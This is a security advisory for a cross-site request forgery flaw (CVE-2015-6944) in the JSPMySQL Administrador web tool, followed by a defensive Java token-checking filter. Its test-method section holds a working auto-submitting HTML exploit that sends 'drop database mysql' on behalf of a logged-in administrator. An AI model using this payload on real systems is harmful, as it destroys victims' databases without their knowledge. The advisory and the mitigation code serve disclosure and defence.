JSP/MySQL Administrador Web Cross-Site Request Forgery Vulnerability (CVE-2015-6944)
Release date:
Updated on:
Affected Systems:
JSPMySQL Administrador 0.1
Description:
CVE (CAN) ID: CVE-2015-6944
JSPMySQL Administrador is a remote management tool for MySQL Databases on JSP Web servers.
JSP/MySQL Administrador Web 1 contains a Cross-Site Request Forgery vulnerability in the cmd parameter of sys/listaBD2.jsp. A remote attacker who lures an authenticated administrator to a malicious page can hijack that user's session and submit database commands on their behalf.
<* Source: hyp3rlinx
Link: http://www.securityfocus.com/archive/1/archive/1/536406/100/0/threaded
*>
Test method:
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use at your own risk!
Hyp3rlinx () provides the following test methods:
<!DOCTYPE html>
<html>
<head>
<title>JSP-MYSQL-ADMIN-CSRF</title>
</head>
<body onload="doit()">
<script>
function doit() {
  var e = document.getElementById('HELL');
  e.submit();
}
</script>
<!-- CSRF: drop mysql database -->
<form id="HELL" action="http://localhost:8081/sys/listaBD2.jsp" method="post">
<input type="text" name="cmd" value="drop database mysql"/>
<input type="text" name="btncmd" value="Enviar"/>
<input type="text" name="bd" value="mysql"/>
</form>
</body>
</html>
Suggestion:
Vendor patch:
JSPMySQL Administrador
----------------------
Currently, the vendor provides no patch or upgrade. Users of this software are advised to monitor the vendor's homepage for an updated version:
https://sites.google.com/site/mfpledon/producao-de-software
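Until a vendor fix is available, the usual defence against this class of flaw is the synchronizer-token pattern. The servlet filter below is an added example, not code from JSPMySQL Administrador: mapped to /sys/* in web.xml, it rejects any POST to sys/listaBD2.jsp that does not carry the per-session token, so an auto-submitted cross-site form like the one in the test method above never reaches the code that executes cmd. The class name CsrfTokenFilter and the field name csrf_token are assumptions.

```java
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.SecureRandom;
import java.util.Base64;
import javax.servlet.*;
import javax.servlet.http.*;

// Hypothetical filter, not part of JSPMySQL Administrador; map it to /sys/* in web.xml
// so that sys/listaBD2.jsp only runs "cmd" for requests that carry the session's token.
public class CsrfTokenFilter implements Filter {
    static final String TOKEN = "csrf_token";          // session attribute and form field (assumed)
    private static final SecureRandom RNG = new SecureRandom();
    public void init(FilterConfig cfg) {}
    public void destroy() {}
    public void doFilter(ServletRequest req, ServletResponse res, FilterChain chain)
            throws IOException, ServletException {
        HttpServletRequest r = (HttpServletRequest) req;
        HttpServletResponse w = (HttpServletResponse) res;
        HttpSession session = r.getSession(true);
        // One unguessable token per session; every JSP form must embed it as
        // <input type="hidden" name="csrf_token" value="<%= session.getAttribute("csrf_token") %>">
        String expected = (String) session.getAttribute(TOKEN);
        if (expected == null) {
            byte[] buf = new byte[32];
            RNG.nextBytes(buf);
            expected = Base64.getUrlEncoder().withoutPadding().encodeToString(buf);
            session.setAttribute(TOKEN, expected);
        }
        String method = r.getMethod();
        if (!"GET".equals(method) && !"HEAD".equals(method)) {
            // A page on another origin cannot read the token, so its auto-submitted
            // form arrives without it (or with a wrong one) and is refused here.
            String supplied = r.getParameter(TOKEN);
            boolean ok = supplied != null && MessageDigest.isEqual(   // constant-time compare
                    expected.getBytes(StandardCharsets.UTF_8),
                    supplied.getBytes(StandardCharsets.UTF_8));
            // Defence in depth: if the browser sent an Origin header it must be our own site.
            String origin = r.getHeader("Origin");
            if (origin != null && !origin.equalsIgnoreCase(r.getScheme() + "://" + r.getHeader("Host"))) ok = false;
            if (!ok) {
                w.sendError(HttpServletResponse.SC_FORBIDDEN, "CSRF check failed");
                return;
            }
        }
        chain.doFilter(req, res);
    }
}
```

The Origin comparison assumes the application is reached directly; behind a TLS-terminating proxy the scheme reported by getScheme() may differ from what the browser used, so adjust that line to the deployment.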